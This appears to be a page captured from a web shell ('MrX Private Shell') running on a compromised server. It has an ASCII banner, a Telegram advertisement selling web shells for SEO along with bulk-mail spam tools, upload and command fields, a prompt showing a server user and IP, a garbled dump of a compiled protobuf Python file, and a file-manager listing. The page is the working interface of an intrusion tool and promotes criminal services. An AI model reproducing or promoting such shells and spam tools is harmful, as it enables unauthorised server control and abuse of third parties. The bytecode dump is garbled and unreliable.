__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

aptanhua@216.73.216.200: ~ $
3

���h��@sddZdZddlmZddlmZej�dkr:ddlmZ	nddlm
Z	e	jZiZdd	�Z
d
d�ZdS)
a
Contains a metaclass and helper functions used to create
protocol message classes from Descriptor objects at runtime.

Recall that a metaclass is the "type" of a class.
(A class is to a metaclass what an instance is to a class.)

In this case, we use the GeneratedProtocolMessageType metaclass
to inject all the useful functionality into the classes
output by the protocol compiler at compile-time.

The upshot of all this is that the real implementation
details for ALL pure-Python protocol buffers are *here in
this file*.
z#robinson@google.com (Will Robinson)�)�api_implementation)�messageZcpp)�cpp_message)�python_messagecCst|�}|�}|j|�|S)z�Generate a new Message instance from this Descriptor and a byte string.

  Args:
    descriptor: Protobuf Descriptor object
    byte_str: Serialized protocol buffer byte string

  Returns:
    Newly created protobuf Message object.
  )�	MakeClassZParseFromString)�
descriptorZbyte_strZresult_classZnew_msg�r� /usr/lib/python3.6/reflection.py�ParseMessageCs

r
cCsh|tkrt|Si}x&t|jj��D]\}}t|�||<q$W||tj<tt|j�t	j
f|�}|t|<|S)a�Construct a class object for a protobuf described by descriptor.

  Composite descriptors are handled by defining the new class as a member of the
  parent class, recursing as deep as necessary.
  This is the dynamic equivalent to:

  class Parent(message.Message):
    __metaclass__ = GeneratedProtocolMessageType
    DESCRIPTOR = descriptor
    class Child(message.Message):
      __metaclass__ = GeneratedProtocolMessageType
      DESCRIPTOR = descriptor.nested_types[0]

  Sample usage:
    file_descriptor = descriptor_pb2.FileDescriptorProto()
    file_descriptor.ParseFromString(proto2_string)
    msg_descriptor = descriptor.MakeDescriptor(file_descriptor.message_type[0])
    msg_class = reflection.MakeClass(msg_descriptor)
    msg = msg_class()

  Args:
    descriptor: A descriptor.Descriptor object describing the protobuf.
  Returns:
    The Message class object described by the descriptor.
  )�MESSAGE_CLASS_CACHE�listZnested_types_by_name�itemsr�GeneratedProtocolMessageTypeZ_DESCRIPTOR_KEY�str�namerZMessage)rZ
attributesrZnested_type�resultrrr	rSs
rN)�__doc__�
__author__Zgoogle.protobuf.internalrZgoogle.protobufrZTypeZgoogle.protobuf.pyextrZmessage_implrrrr
rrrrr	�<module>.s

Filemanager

Name Type Size Permission Actions
__init__.cpython-36.opt-1.pyc File 319 B 0644
__init__.cpython-36.pyc File 319 B 0644
any_pb2.cpython-36.opt-1.pyc File 2.09 KB 0644
any_pb2.cpython-36.pyc File 2.09 KB 0644
any_test_pb2.cpython-36.opt-1.pyc File 2.18 KB 0644
any_test_pb2.cpython-36.pyc File 2.18 KB 0644
api_pb2.cpython-36.opt-1.pyc File 4.73 KB 0644
api_pb2.cpython-36.pyc File 4.73 KB 0644
descriptor.cpython-36.opt-1.pyc File 31.27 KB 0644
descriptor.cpython-36.pyc File 31.27 KB 0644
descriptor_database.cpython-36.opt-1.pyc File 4.11 KB 0644
descriptor_database.cpython-36.pyc File 4.11 KB 0644
descriptor_pb2.cpython-36.opt-1.pyc File 30.36 KB 0644
descriptor_pb2.cpython-36.pyc File 30.36 KB 0644
descriptor_pool.cpython-36.opt-1.pyc File 26.77 KB 0644
descriptor_pool.cpython-36.pyc File 26.8 KB 0644
duration_pb2.cpython-36.opt-1.pyc File 2.13 KB 0644
duration_pb2.cpython-36.pyc File 2.13 KB 0644
empty_pb2.cpython-36.opt-1.pyc File 1.69 KB 0644
empty_pb2.cpython-36.pyc File 1.69 KB 0644
field_mask_pb2.cpython-36.opt-1.pyc File 2.05 KB 0644
field_mask_pb2.cpython-36.pyc File 2.05 KB 0644
json_format.cpython-36.opt-1.pyc File 20.32 KB 0644
json_format.cpython-36.pyc File 20.32 KB 0644
map_proto2_unittest_pb2.cpython-36.opt-1.pyc File 18.31 KB 0644
map_proto2_unittest_pb2.cpython-36.pyc File 18.31 KB 0644
map_unittest_pb2.cpython-36.opt-1.pyc File 39.56 KB 0644
map_unittest_pb2.cpython-36.pyc File 39.56 KB 0644
message.cpython-36.opt-1.pyc File 10.48 KB 0644
message.cpython-36.pyc File 10.48 KB 0644
message_factory.cpython-36.opt-1.pyc File 3.93 KB 0644
message_factory.cpython-36.pyc File 3.93 KB 0644
proto_builder.cpython-36.opt-1.pyc File 2.68 KB 0644
proto_builder.cpython-36.pyc File 2.68 KB 0644
reflection.cpython-36.opt-1.pyc File 2.65 KB 0644
reflection.cpython-36.pyc File 2.65 KB 0644
service.cpython-36.opt-1.pyc File 8.56 KB 0644
service.cpython-36.pyc File 8.56 KB 0644
service_reflection.cpython-36.opt-1.pyc File 9.76 KB 0644
service_reflection.cpython-36.pyc File 9.76 KB 0644
source_context_pb2.cpython-36.opt-1.pyc File 2.15 KB 0644
source_context_pb2.cpython-36.pyc File 2.15 KB 0644
struct_pb2.cpython-36.opt-1.pyc File 5.02 KB 0644
struct_pb2.cpython-36.pyc File 5.02 KB 0644
symbol_database.cpython-36.opt-1.pyc File 5.32 KB 0644
symbol_database.cpython-36.pyc File 5.32 KB 0644
test_messages_proto2_pb2.cpython-36.opt-1.pyc File 38.69 KB 0644
test_messages_proto2_pb2.cpython-36.pyc File 38.69 KB 0644
test_messages_proto3_pb2.cpython-36.opt-1.pyc File 43.27 KB 0644
test_messages_proto3_pb2.cpython-36.pyc File 43.27 KB 0644
text_encoding.cpython-36.opt-1.pyc File 3.06 KB 0644
text_encoding.cpython-36.pyc File 3.06 KB 0644
text_format.cpython-36.opt-1.pyc File 38.55 KB 0644
text_format.cpython-36.pyc File 38.58 KB 0644
timestamp_pb2.cpython-36.opt-1.pyc File 2.14 KB 0644
timestamp_pb2.cpython-36.pyc File 2.14 KB 0644
type_pb2.cpython-36.opt-1.pyc File 8.49 KB 0644
type_pb2.cpython-36.pyc File 8.49 KB 0644
unittest_arena_pb2.cpython-36.opt-1.pyc File 2.76 KB 0644
unittest_arena_pb2.cpython-36.pyc File 2.76 KB 0644
unittest_custom_options_pb2.cpython-36.opt-1.pyc File 32.24 KB 0644
unittest_custom_options_pb2.cpython-36.pyc File 32.24 KB 0644
unittest_import_pb2.cpython-36.opt-1.pyc File 3.11 KB 0644
unittest_import_pb2.cpython-36.pyc File 3.11 KB 0644
unittest_import_public_pb2.cpython-36.opt-1.pyc File 1.93 KB 0644
unittest_import_public_pb2.cpython-36.pyc File 1.93 KB 0644
unittest_mset_pb2.cpython-36.opt-1.pyc File 4.46 KB 0644
unittest_mset_pb2.cpython-36.pyc File 4.46 KB 0644
unittest_mset_wire_format_pb2.cpython-36.opt-1.pyc File 2.51 KB 0644
unittest_mset_wire_format_pb2.cpython-36.pyc File 2.51 KB 0644
unittest_no_arena_import_pb2.cpython-36.opt-1.pyc File 1.83 KB 0644
unittest_no_arena_import_pb2.cpython-36.pyc File 1.83 KB 0644
unittest_no_arena_pb2.cpython-36.opt-1.pyc File 20.24 KB 0644
unittest_no_arena_pb2.cpython-36.pyc File 20.24 KB 0644
unittest_no_generic_services_pb2.cpython-36.opt-1.pyc File 3.23 KB 0644
unittest_no_generic_services_pb2.cpython-36.pyc File 3.23 KB 0644
unittest_pb2.cpython-36.opt-1.pyc File 124.95 KB 0644
unittest_pb2.cpython-36.pyc File 124.95 KB 0644
unittest_proto3_arena_pb2.cpython-36.opt-1.pyc File 21.42 KB 0644
unittest_proto3_arena_pb2.cpython-36.pyc File 21.42 KB 0644
wrappers_pb2.cpython-36.opt-1.pyc File 4.58 KB 0644
wrappers_pb2.cpython-36.pyc File 4.58 KB 0644